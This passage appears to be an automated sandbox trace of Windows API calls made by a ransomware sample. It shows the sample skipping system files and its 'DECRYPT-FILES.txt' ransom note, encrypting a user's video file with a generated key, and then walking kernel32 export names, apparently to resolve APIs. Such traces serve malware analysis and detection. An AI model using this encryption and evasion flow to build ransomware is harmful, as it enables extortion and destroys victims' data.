cFileName="vpyzRTKDjrNi.flv", cAlternateFileName="VPYZRT~1.FLV")) returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="autorun.inf") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="boot.ini") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="desktop.ini") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="ntuser.dat") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="iconcache.db") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="bootsect.bak") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="ntuser.dat.log") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="thumbs.db") returned 1 [0087.613] lstrcmpiW (lpString1="vpyzRTKDjrNi.flv", lpString2="Bootfont.bin") returned 1 [0087.613] lstrlenW (lpString="vpyzRTKDjrNi.flv") returned 16 [0087.613] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.613] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.613] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.613] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.613] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.613] lstrlenW (lpString="vpyzRTKDjrNi.flv") returned 16 [0087.613] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.613] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="vpyzRTKDjrNi.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv" [0087.613] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\vpyzRTKDjrNi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\vpyzrtkdjrni.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.613] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=29519) returned 1 [0087.613] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.614] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.614] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.614] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.614] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.615] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.615] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.616] CloseHandle (hObject=0x42c) returned 1 [0087.616] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.616] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.616] CloseHandle (hObject=0x0) returned 0 [0087.616] CloseHandle (hObject=0x428) returned 1 [0087.617] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.617] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.617] GetTickCount () returned 0x114e58f [0087.617] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.617] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.617] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.618] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.618] lstrlenA (lpString="kernel32.dll") returned 12 [0087.618] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.618] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.618] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.618] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.618] lstrlenA (lpString="ADDATOMA") returned 8 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.618] lstrlenA (lpString="ADDATOMW") returned 8 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.618] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.618] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.618] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.618] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.618] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.618] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.619] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.619] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.619] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.619] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.619] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.619] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.619] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.619] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.619] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.619] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.619] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.619] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.619] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.619] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.619] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.619] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.619] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.619] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.619] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.619] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.620] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.620] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.620] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.620] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.620] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.620] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.620] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.620] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.620] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.620] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.620] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.620] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.620] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.620] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.620] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.620] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.620] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.620] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.620] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.621] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.621] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.621] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.621] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.621] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.621] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.621] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.621] lstrlenA (lpString="BEEP") returned 4 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.621] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.621] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.621] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.621] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.621] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.621] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.621] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.621] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.621] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.621] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.622] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.622] lstrlenA (lpString="CANCELIO") returned 8 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.622] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.622] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.622] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.622] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.622] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.622] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.622] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.622] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.622] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.622] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.622] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.622] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.622] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.622] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.622] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.622] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.623] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.623] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.623] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.623] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.623] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.623] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.623] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.623] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.623] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.623] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.623] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" 